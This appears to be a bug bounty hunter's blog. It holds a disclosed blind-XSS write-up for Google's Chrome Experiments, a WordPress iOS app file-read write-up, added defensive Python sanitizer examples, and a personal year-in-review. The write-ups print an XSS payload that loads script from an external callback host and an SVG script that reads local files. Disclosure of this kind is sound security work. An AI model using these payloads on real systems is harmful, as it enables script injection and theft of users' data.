Friday, August 03, 2018

Blind-XSS in Chrome Experiments - Google (Write Up)

Hello Everyone,

In this article, I will show you how I found a blind-XSS vulnerability that leads to Information Disclosure in one of Google's own products, Chrome Experiments (

Back in June last year, while looking for Google bug bounty related write-ups, I found a video proof of concept on YouTube about a Cross-Site Scripting vulnerability on one of the Google-owned products, Chrome Experiments ( on the description of his video PoC, he didn't mention whether the bug was awarded or not, so I decided to hunt on the same domain. I fired up Sublist3r just to check if there were any interesting subdomains and found an interesting one, which is On the subdomain, I found a Cross-Site Scripting vulnerability and reported it to the Google VRP, which ended up as a duplicate.

XSS in [Duplicate]

So, long story short, I found a blind-XSS on which is also related to on the new target, I found an interesting page which is On my first test, I tried to look for some XSS, and nothing was found. After a few minutes of testing, I decided to fire up my XSSHunter account to test for a blind-XSS. On the new target page, I filled up the form with some blind-XSS payloads and submitted it to the server, but I didn't receive any email about a successful payload for the next few weeks after I submitted it. But fortunately, on the 30th of August, a few months after I submitted my payload, I received an email from XSSHunter saying that one of my payloads had fired!

But in the first place, the XSSHunter email was very confusing, since it didn't even give me any hint where it came from. After a few hours of investigation, I found a hint in the "DOM" field of the XSSHunter logs. I noticed that XSSHunter had captured some interesting information from Chrome Experiments: hundreds of personal emails and private messages from the customers, and I also found my own test submission in the logs. That's where I remembered which target page I had submitted my blind-XSS payload to.

So below is the Proof of Concept I submitted to Google Security Team.

    Report details:

    ID: 5-64xxxxxxxxxxx

    1. Go to and register
    2. Go to
    3. In the "Submit your experiment" form, input your blind XSS payload. My payload was ("><script src=https://<redacted>></script>)
    4. Click Submit.

    If the admin of opens the admin panel to check the submissions, the blind XSS payload will fire on and you will receive an email from XSSHunter that your payload fired on

    Attack scenario:
    This issue is not just blind-XSS. In the logs that were emailed to me from XSSHunter, it leaks hundreds of different email addresses of the Chrome Experiments customers who submitted to them.

    Check this link for the logs that were emailed to me from XSSHunter about the Chrome Experiments: http://<redacted>/chromeexperimentspoc.html

    In the logs, there are some email address leaks from the Chrome Experiments customers, which results in Information Disclosure.

    PS: it took me months before I received an email from XSSHunter that my payload from Chrome Experiments fired on their side, maybe because the admin from Chrome Experiments logged in to the admin panel of Chrome Experiments the other day and opened the submission page.

    I hope you understand
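As an added example (not code from the original post, nor from Google or XSSHunter), here is a Python sketch of the pattern behind this bug seen from the defender's side: a constructed list of stored form submissions, one of which carries a blind-XSS style payload, the vulnerable way of building the admin page beside the output-encoded version, and a simple triage check over the stored fields. The names `SUBMISSIONS`, `render_admin_rows_safe`, the callback host and all sample data are assumptions made for this example.

```python
import html
import re

# Constructed sample of what a "submit your experiment" form might store
# (not real Chrome Experiments data). The second entry carries a blind-XSS
# style payload: inert for the submitter, live wherever an admin page renders
# the stored value without output encoding.
SUBMISSIONS = [
    {"email": "alice@example.test", "title": "Particle playground"},
    {"email": "mallory@example.test",
     "title": '"><script src=https://xss-callback.example></script>'},
]

ROW_TEMPLATE = '<tr><td>{email}</td><td><input value="{title}"></td></tr>'

def render_admin_rows_unsafe(submissions):
    """The vulnerable pattern: stored values pasted straight into admin HTML."""
    return "\n".join(ROW_TEMPLATE.format(**s) for s in submissions)

def render_admin_rows_safe(submissions):
    """Hardened: every untrusted value is HTML-escaped for the context it lands
    in. quote=True also turns '"' into &quot;, so the payload cannot close the
    value="..." attribute it is written into."""
    return "\n".join(
        ROW_TEMPLATE.format(**{k: html.escape(str(v), quote=True)
                               for k, v in s.items()})
        for s in submissions
    )

_SCRIPT_START = re.compile(r"<script\b", re.IGNORECASE)

def contains_live_script(rendered_html):
    """Post-render check: the template itself emits no <script>, so any
    occurrence in the output is injected markup."""
    return _SCRIPT_START.search(rendered_html) is not None

_BREAKOUT = re.compile(r"""["'<>]""")

def flag_suspicious_submissions(submissions):
    """Defender-side triage: list submitters whose fields contain characters
    that close an attribute or open a tag. Worth an alert and a look at the
    admin panel's encoding; not a substitute for escaping on output."""
    return [s["email"] for s in submissions
            if any(_BREAKOUT.search(str(v)) for v in s.values())]

if __name__ == "__main__":
    print(render_admin_rows_unsafe(SUBMISSIONS))
    print(render_admin_rows_safe(SUBMISSIONS))
    print(flag_suspicious_submissions(SUBMISSIONS))
```

The point of the two renderers is that the same stored row is harmless or live depending only on the admin page's encoding; the submitter never sees the payload execute, which is exactly why the report above took months to fire.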



Reported: Friday, September 1, 2017 at 1:27 AM
Triaged: Friday, September 1, 2017 at 6:52 PM
Nice Catch: Monday, September 4, 2017 at 9:04 PM
Awarded: Thursday, September 7, 2017 at 1:17 AM ($100)
Fixed: ----

Shoutout to @IAmMandatory for the awesome XSSHunter tool.

I hope you enjoy this short story and write up.

"The biggest adventure you can take is to live the life of your dreams"
~Oprah Winfrey

Wednesday, February 21, 2018

[RCE] Remote Code Execution in WordPress iOS Application (version 9.3)

Hello Everyone,

This article will show you how I found a Remote Code Execution vulnerability in WordPress iOS Application version 9.3 on my iPod Touch (iOS version 9.3.5).

It was a cold Thursday night of February 15 when I was looking for a good program to spend my night with. While checking HackerOne's hacktivity page, I found some good stuff to read and found out that WordPress had some newly disclosed reports, which gave me the motivation to spend my night on their program.

I fired up Sublist3r to check if there were some good subdomains to hunt. After a few hours of looking for vulnerabilities on different subdomains and directories, I didn't find even one, so I went to my inbox and checked my previous reports to WordPress. I noticed that I had reported an issue which I found in the WordPress iOS app a year ago.

My previous report gave me another idea, so I downloaded the WordPress iOS app again on my iPod Touch, which is stuck on iOS version 9.3.5 since Apple doesn't release updates for it anymore. While downloading the app, it said that the new version of the app was not compatible with my iOS version, so I needed to download the previous/older version of the app that is compatible with my device. So I downloaded WordPress iOS app version 9.3, which is the recommended version from the App Store for my device.

After downloading the app, I found some XSS issues but didn't report them since they were just self-XSS. After a few hours of having fun with the app, I found this Remote Code Execution vulnerability in the editor of the app. So below is the proof of concept I reported to WordPress.

Proof of Concept


I found out that the WordPress iOS Application has a Remote Code Execution when posting a blog via the iOS Application.

Tested in iOS 9.3.5

Injected Payload

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="">
  <script>
    // Synchronous XHR that reads the file named by "file" from inside the
    // app's editor WebView; the result is exposed through the callback below.
    function readTextFile(file)
    {
      var rawFile = new XMLHttpRequest();
      rawFile.open("GET", file, false);
      rawFile.onreadystatechange = function ()
      {
        if(rawFile.readyState === 4)
        {
          // status 0 is what a local (file://) fetch returns instead of 200
          if(rawFile.status === 200 || rawFile.status == 0)
          {
            var allText = rawFile.responseText;
            // what the report did with allText, and the path it passed to
            // readTextFile, are not shown on this page
          }
        }
      };
      rawFile.send(null);
    }
  </script>
</svg>

  1. Log in to your WordPress account using the WordPress iOS Application
  2. Create a new blog post
  3. In the post body, tap the <> button, then input the given payload.
  4. Tap the <> button again and see the result.

I hope you will fix this issue as soon as possible.
Cheers and have a good day,
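As an added example (not WordPress's code or its fix), here is a Python allow-list sanitizer of the kind a server or app would run over post markup before handing it to an editor preview WebView. It rebuilds the markup from parsed tokens, drops <script> elements together with their content (including inside <svg>), drops on* event attributes and URLs whose scheme is not http(s), such as file: or javascript:, and keeps an audit list of what it removed. The policy sets, the class and function names, and the constructed `SAMPLE_POST` are all assumptions made for this example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allow-list policy (assumption for this example): elements and attributes the
# editor preview may render. Everything else is dropped, not escaped.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "img", "svg", "circle", "rect", "path"}
ALLOWED_ATTRS = {"href", "src", "alt", "width", "height", "xmlns",
                 "cx", "cy", "r", "x", "y", "d", "fill"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", ""}      # "" = relative URL
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style"}   # drop the element and its text

class Sanitizer(HTMLParser):
    """Rebuilds markup from parsed tokens so nothing reaches the output
    unparsed; each removed element/attribute leaves an entry in self.dropped."""

    def __init__(self):
        super().__init__()            # convert_charrefs=True: text arrives decoded
        self.out = []
        self.dropped = []
        self._skip = 0                # nesting depth inside script/style

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
            self.dropped.append("element:" + tag)
            return
        if self._skip:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append("element:" + tag)
            return
        kept = []
        for name, value in attrs:     # HTMLParser already lower-cases names
            value = value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS:
                self.dropped.append("attr:%s@%s" % (tag, name))
                continue
            if name in URL_ATTRS:
                scheme = urlsplit(value.strip()).scheme.lower()
                if scheme not in SAFE_SCHEMES:
                    self.dropped.append("url:%s@%s=%s:" % (tag, name, scheme))
                    continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))

    # Comments, <!DOCTYPE> and <?xml ...?> processing instructions are dropped
    # by inheriting HTMLParser's no-op handlers for them.

def sanitize(untrusted_markup):
    """Return (clean_markup, dropped) for a post body from an untrusted source."""
    parser = Sanitizer()
    parser.feed(untrusted_markup)
    parser.close()
    return "".join(parser.out), parser.dropped

# Constructed sample post body (not the payload from the report): an SVG that
# smuggles a script element, plus an inline handler and a javascript: link.
SAMPLE_POST = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<svg xmlns="http://www.w3.org/2000/svg">'
    '<script>/* constructed: anything here would run in the preview WebView */</script>'
    '<circle r="4"/></svg>'
    '<p onclick="x()">hi <a href="javascript:x()">bad</a> '
    '<a href="https://example.test/">ok</a></p>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_POST)
    print(clean)
    print(dropped)
```

Rebuilding from tokens rather than pattern-matching the raw string is the design choice that matters: the `<?xml ... ?>` prologue, the script inside the SVG and the event attribute are all handled by the same parser the output is generated from, so there is no second interpretation of the bytes for a WebView to disagree with. The scheme check on `src`/`href` is what keeps a `file:` reference out of the preview even when the attribute itself is allowed.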



Reported: February 15, 2018 
First Response: February 15, 2018 
Second Response (Marked as Needs more information): February 15, 2018 
Third Response (Marked as Informative): February 21, 2018   
Final Response (Hi. Sure, please feel free to publish it on your blog if you'd like.): February 21, 2018   

I hope you enjoy this article.

"Life is a journey that must be traveled no matter how bad the roads and accommodations."
~ Oliver Goldsmith

Monday, December 05, 2016

2016 Year in Review


Hello Everyone,

This year, I would like to end my 2016 with a Year in Review.

2016: another wonderful year in my life; lots of awesome, amazing and memorable things happened, lots of failures, successes and so on. So, as the year comes to an end, here are the things that happened in my 2016 journey.


1. Travels: lots of traveling happened this year, although not outside of Mindanao, but still, it's one of my favorite things that I've done this year. Traveling and meeting new people and cultures is one of my main life goals.

This year, I traveled to Pagadian City, Zamboanga City, Dipolog City, Dapitan City (it was my first time in Dapitan, such a lovely place) and Baroy, Lanao Del Norte. Hopefully next year, I can spend some of my bug bounty rewards on another travel adventure; I already have the list of the places that I want to go to.

Here are some of the pictures I took during my travels.

On my way to Dapitan.
Visited Gloria de Dapitan for the first time.
Chillin' at the bench inside Gloria de Dapitan with my homies
Me sitting on the wooden bench inside Jose Rizal's house (Replica)
While waiting for my name to be called at the NBI Office in Pagadian City.
On my way to Baroy, Lanao Del Norte.
Chill morning in Baroy, Lanao.
On my way home from Baroy, took this shot while in Aurora, Zamboanga Del Sur.
On my way to Zamboanga City.
Took a picture of Jose Rizal's house (Replica) in Talisay, Dapitan City.

All in all, my travel adventure this year is such a wonderful experience.


2. The bug bounty: for the past 4 years of my bug bounty career, I learned a lot of things in the field of Information Technology, met new friends (some just on social media), earned some money without having a regular job (just the bug bounty thing), and bought some things that I wanted using my bug bounty rewards.

I started participating in the bug bounty community in mid-2013, and I have reported a lot of different security vulnerabilities to hundreds of companies since then. But in 2016, my bug bounty journey was a little bit different from the past years; I became a seasonal researcher since I couldn't manage my time for it like before, but still, this year's bug bounty journey is just another wonderful and memorable adventure.

I was acknowledged again by Microsoft for the second time.

Acknowledged by Twitter for the third time, two times this year (2013, 2014 and 2016) [Write Up of one of the issues I reported this year >> Here].

Discovered a critical vulnerability in Cydia [iOS] (Write Up was here) but decided not to report it.

Discovered a Universal XSS in Comodo Dragon version (Write Up was here; shout out to Inti De Ceukelaire for this thing).

Acknowledged and rewarded by different companies; I can't mention them all, but thank you very much to those companies. Really stoked to have them become part of my 2016 bug bounty adventure.

Joined the most prestigious "Synack Red Team" community (just another dream come true for me).

Dropped out of the Bugcrowd Top 100 Security Researchers, but hopefully before this year finally ends, I will be in the Top 100 again, since I made a promise to myself to be in the Bugcrowd top 100 researchers for 4 years.

Received many bounties from different companies (thank you, bug bounty).

Just like the previous years, I participated in some private and flex bug bounty programs and received bounties from them.

One of my favorite things in bug bounty, the swag; I received a lot of swag from different companies.

Just like before, I met new people (especially on social media); some of them became real friends, some of them are the kind of people who think a hacker is just a guy who hacks Facebook accounts (HAHAHA!), and some of them are people who ask for help on how to start participating in bug bounty programs.

All in all, this year's bug bounty adventure is so hype; although it's a little bit different from the previous years, I still managed to make it another year of wonderful bug bounty adventure. Thank you to all the companies, especially Bugcrowd, HackerOne, Cobalt and my new family, the Synack Red Team; words can't describe how happy I am that you guys became part of another wonderful bug bounty adventure. I hope next year's adventure will be more exciting and interesting.


3. The job opportunities: just like the previous years, I received a lot of job opportunities this year because of my bug bounty career as a security researcher, but I decided not to accept them for now, since all I want to do first is to enjoy my teenage adventure and enjoy my life as a single person. Jobs are everywhere, though some say opportunity knocks once; I'm not afraid of not accepting those opportunities that were given to me. I remember an article I read before about why the author left the company where he was working; he says on his blog that he doesn't want to stick with one company or job, and all he wants is to build his own company and learn and progress more from it.


4. My adventure with my IBBRC family: as a BMXer, IBBRC (Ipil Board and Bike Riding Community) is also a big part of this year's adventure. We did a lot of filming, discovered a lot of beautiful spots in our hometown, met new friends because of riding, had lots of crashes and new tricks, and better progression for everyone in the team. All in all, I'm so stoked that my IBBRC family was a wonderful part of my 2016 journey; really hyped for all my friends in IBBRC.

Here are some of the projects we did this year:


We filmed a lot this year and hopefully next year, more video edits.


5. My music career: as an EDM producer, having a family of producers is a dream come true. This year, a friend of mine asked me to join his group of music producers (although the group is not so big, I'm happy to be part of it) so that I can promote my tracks easily with them. Although I haven't been so active in producing EDM tracks over the last few months, Virtous Music still invited me to become part of their group (the group is like a record label) and released 4 of my EDM tracks with them. Having them become part of my 2016 adventure is one of the happiest moments in my life. Thanks to my Virtous Music family.


6. My Invalid Web Security (IWS) family: we shared lots of ideas, I learned a lot from my IWS family, and I'm really happy to have my IWS family become part of my 2016 adventure.

This year, I shared a lot of moments with the people I met and learned a lot from them. They motivate me to progress more in the upcoming years; really happy to have them in this year's adventure.

So, I hope you guys also enjoyed your 2016 adventure. Happy Holidays.

"The best way to pay for a lovely moment is to enjoy it." 
-Richard Bach